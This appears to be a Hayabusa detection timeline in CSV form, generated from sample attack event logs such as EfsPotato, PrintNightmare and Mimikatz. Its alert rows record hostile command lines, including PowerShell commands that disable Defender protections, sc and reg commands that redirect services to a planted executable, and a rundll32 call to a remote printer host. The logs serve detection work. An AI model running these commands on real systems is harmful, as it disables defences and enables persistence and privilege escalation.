PGUID: 00247C92-707C-6122-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.884 +09:00,LAPTOP-JU4M3I0E,18,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\temp\EfsPotato.exe whoami | LID: 0x3e7 | PID: 11328 | PGUID: 00247C92-A692-6122-0000-0010A5CD1F02,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,low,Disc,Local Accounts 
Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.997 +09:00,LAPTOP-JU4M3I0E,5,info,,Process Terminated,Process: C:\temp\EfsPotato.exe | PID: 14048 | PGUID: 00247C92-A691-6122-0000-001021C31F02,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:40.014 +09:00,LAPTOP-JU4M3I0E,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:53686 (LAPTOP-JU4M3I0E) | Dst: 0:0:0:0:0:0:0:1:445 (LAPTOP-JU4M3I0E) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:40.014 +09:00,LAPTOP-JU4M3I0E,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:53686 (LAPTOP-JU4M3I0E) | Dst: 
0:0:0:0:0:0:0:1:445 (LAPTOP-JU4M3I0E) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:52.250 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe"" -Embedding | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p | LID: 0xbf9eb | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:52.303 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140_1.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=58D562E8E3496A97E0CFE34C64B7AC79F40A9367,MD5=639584D9FCDC54D7644328650028F453,SHA256=4EF85487DE3B07AB52D269A51CFC2499C2E77ECBE2C63EC556F2C59AAD311B81,IMPHASH=AE0BDE6314FA2027B54CE04898F6AB69",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:52.315 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\UpdateRingSettings.dll | Process: 
C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=50FBFD34BCB3A0CDCAE94D963AF6DA5B6EAAF702,MD5=E5783051077ECC0CF81051ACC6C7872D,SHA256=8E63CC1DDD7C554532FB00A2E3198D712ED19DD64EF6818119AFC2A5214148A8,IMPHASH=8B31BD73AB0C52BD4506C09FDABE59CE",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:52.324 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\LoggingPlatform.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=479CD840A5352F76051B5722E4CD9004C72567EC,MD5=090BBA421A213F67FBFE10231116E008,SHA256=1E8923D71C32876B53A887983C63BC94914AB91CAAF1E13D3979F64F529DD043,IMPHASH=D39A0141F3324CB1CE047427FD20FCEA",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:52.335 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\msvcp140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: 
SHA1=6648A614B14F15ECB522A6D2BDF5E5031417742F,MD5=5BEB853A59982A96052364AB7BDE8D20,SHA256=CEACFE080276ACDF3FF731A8CA68140BCF589CEB1E3DD7544E0D4765E0489D9E,IMPHASH=4F1912F58F8D1AE7998EF5303198D62D",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:52.342 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=344B09330D8CC196728BC4320194FE49993D3A2C,MD5=B3FF2F3D0040F23F36E9F2A3444F42EA,SHA256=3A8DAE539BB91C950CCD6EA244D5C09CDF44AEBC8EE4FF9C5094D5195F40E82A,IMPHASH=44C3854843F7A3FCCDF8DDBBEA66F302",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:52.344 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=344B09330D8CC196728BC4320194FE49993D3A2C,MD5=B3FF2F3D0040F23F36E9F2A3444F42EA,SHA256=3A8DAE539BB91C950CCD6EA244D5C09CDF44AEBC8EE4FF9C5094D5195F40E82A,IMPHASH=44C3854843F7A3FCCDF8DDBBEA66F302",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:52.350 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=344B09330D8CC196728BC4320194FE49993D3A2C,MD5=B3FF2F3D0040F23F36E9F2A3444F42EA,SHA256=3A8DAE539BB91C950CCD6EA244D5C09CDF44AEBC8EE4FF9C5094D5195F40E82A,IMPHASH=44C3854843F7A3FCCDF8DDBBEA66F302",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:52.355 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\msvcp140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=6648A614B14F15ECB522A6D2BDF5E5031417742F,MD5=5BEB853A59982A96052364AB7BDE8D20,SHA256=CEACFE080276ACDF3FF731A8CA68140BCF589CEB1E3DD7544E0D4765E0489D9E,IMPHASH=4F1912F58F8D1AE7998EF5303198D62D",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:52.513 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\OneDriveTelemetryStable.dll | Process: 
C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=8D3D5F03E129C08F890847F7B12E620F9315B396,MD5=B01D2385E32F4251399C7EDCE8364967,SHA256=5E6CC575BEC320E4502B48B1050FE255BF6504013FAA6EE62A80707E3092383E,IMPHASH=C719A37B3234505BC0AADBB7DE7C9654",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:52.545 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileSyncTelemetryExtensions.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=B535176F0E42CE3DEE9F650070AB1CAEA840CFBF,MD5=68E4FB636BC56B74BF54F18223238862,SHA256=1084C4AF96A06F8A84CA279C659394ACB1BC80D1F5DBC16EB62964C5632C41A0,IMPHASH=D207E97F105829D9C63E79F98B136D2B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:52.931 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuthLib64.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: 
SHA1=FFFD189CF1234EC54392F57C8D6D683A92DEB2B4,MD5=5E3A74A8E0295B1396C1A5D5D5C0664F,SHA256=E0132392E8014B120BBF51F2E98E9BB329877666A7D005353A4E96DF14DFFD4C,IMPHASH=592278570E604A14992850A5B210142D",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-10-02 02:30:39.083 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: at 13:20 /interactive cmd | Path: C:\Windows\System32\at.exe | PID: 0x15cc | User: admmig | LID: 0x65b0f5db,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-Interactive shell using AT schedule task.evtx +2021-10-06 18:46:09.533 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -command ""Set-MpPreference -EnableControlledFolderAccess Disabled"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x242c | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx +2021-10-06 18:46:13.168 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -command ""Set-MpPreference -PUAProtection disable"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x21f4 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx +2021-10-06 
18:46:28.683 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1bcc | User: WIN10-02$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx +2021-10-07 23:52:54.848 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: REG ADD ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time"" /v FailureCommand /t REG_SZ /d ""C:\tmp\pentestlab.exe"" | Path: C:\Windows\System32\reg.exe | PID: 0x2a58 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with Failure Command.evtx +2021-10-07 23:53:02.147 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc failure W32Time command= ""\""c:\Windows\system32\pentestlab.exe\"""" | Path: C:\Windows\System32\sc.exe | PID: 0xa00 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with Failure Command.evtx +2021-10-08 00:36:23.429 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc config xboxgip binPath= ""C:\windows\system32\pentestlab.exe"" | Path: C:\Windows\System32\sc.exe | PID: 0x29cc | User: admmig | LID: 
0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with malicious path.evtx +2021-10-08 00:36:24.892 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\xboxgip"" /v ImagePath /t REG_SZ /d ""C:\tmp\pentestlab.exe"" | Path: C:\Windows\System32\reg.exe | PID: 0x11b8 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with malicious path.evtx +2021-10-08 17:53:42.131 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc sdset xboxgip ""D:(A;;CCLCSWRPWPDTLOCRRC;;;SY) | Path: C:\Windows\System32\sc.exe | PID: 0x1d28 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (sc).evtx +2021-10-08 19:05:29.432 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\XblGameSave\Security"" /v Security /t REG_BINARY /d fe340ead | Path: C:\Windows\System32\reg.exe | PID: 0x18c4 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (registry).evtx +2021-10-08 19:05:36.298 
+09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2af0 | User: WIN10-02$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (registry).evtx +2021-10-08 21:56:58.803 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 21:57:04.504 +09:00,fs01.offsec.lan,4688,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 21:57:06.763 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: admmig | Target User: gentilguest | IP Address: 20.188.56.147 | Process: | Target Server: printnightmare.gentilkiwi.com,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 21:57:06.763 +09:00,fs01.offsec.lan,4648,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 21:57:06.869 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: rundll32 
printui.dll,PrintUIEntry /in /n""\\printnightmare.gentilkiwi.com\Kiwi Legit Printer"" | Path: C:\Windows\System32\rundll32.exe | PID: 0x1670 | User: admmig | LID: 0x65b0f5db",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 21:57:06.869 +09:00,fs01.offsec.lan,4688,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 21:57:18.646 +09:00,fs01.offsec.lan,6416,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 21:57:19.072 +09:00,fs01.offsec.lan,6416,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-19 23:33:13.262 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1201-Password Policy Discovery/ID4688-Password policy discovery via commandline.evtx +2021-10-19 23:40:28.001 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4688-Group discovery via commandline.evtx +2021-10-19 23:42:41.234 
+09:00,FS03.offsec.lan,4720,low,Persis,Local User Account Created,User: toto3 | SID: S-1-5-21-3410678313-1251427014-1131291384-1004,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx +2021-10-19 23:44:30.780 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID4688-Network share discovery or connection via commandline.evtx +2021-10-19 23:45:16.394 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-Network share manipulation via commandline.evtx +2021-10-20 18:18:07.101 +09:00,FS03.offsec.lan,11,medium,,File Created_Sysmon Alert,T1003 | Path: C:\Windows\System32\mimilsa.log | Process: C:\Windows\system32\lsass.exe | PID: 512 | PGUID: 7CF65FC7-6649-6165-0B00-000000001200,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-Mimikatz LSA SSP clear text password exfiltration.evtx +2021-10-20 18:18:07.101 +09:00,FS03.offsec.lan,11,critical,CredAccess,Mimikatz MemSSP Default Log File Creation,,rules/sigma/file_event/file_event_mimimaktz_memssp_log_file.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-Mimikatz LSA SSP clear text password exfiltration.evtx +2021-10-20 22:39:12.731 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: 
admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,info,,Logon Type 9 - NewCredentials,User: admmig | Computer: - | IP Addr: ::1 | LID: 0x266e045 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x266e045,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx 